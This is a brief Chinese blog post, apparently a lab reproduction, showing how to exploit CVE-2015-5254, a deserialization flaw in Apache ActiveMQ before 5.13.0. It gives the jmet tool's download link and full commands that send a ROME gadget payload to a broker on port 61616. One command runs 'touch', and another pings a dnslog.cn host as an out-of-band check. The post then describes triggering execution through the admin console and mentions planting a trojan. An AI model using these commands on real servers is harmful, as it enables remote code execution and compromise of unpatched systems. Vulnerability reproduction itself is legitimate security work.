V2AS问路
Apache ActiveMQ(cve-2015-5254)
阅读原文时间:2023年07月08日阅读:2

影响版本

Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞

复现

使用工具执行命令

工具地址

https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar

同目录下创建一个external文件夹(否则报错)

写入木马。或者执行命令

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/sucess" -Yp ROME   192.168.49.2  61616

或者

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "ping npmags.dnslog.cn" -Yp ROME 192.168.49.2 61616

访问http://192.168.49.2:8161/admin/browse.jsp?JMSDestination=event

点击消息。执行命令

手机扫一扫

移动阅读更方便

阿里云服务器
腾讯云服务器
七牛云服务器

你可能感兴趣的文章

RocketMQ专题1:入门
RocketMQ系列(一) 基本介绍
Java分布式系统---消息中间件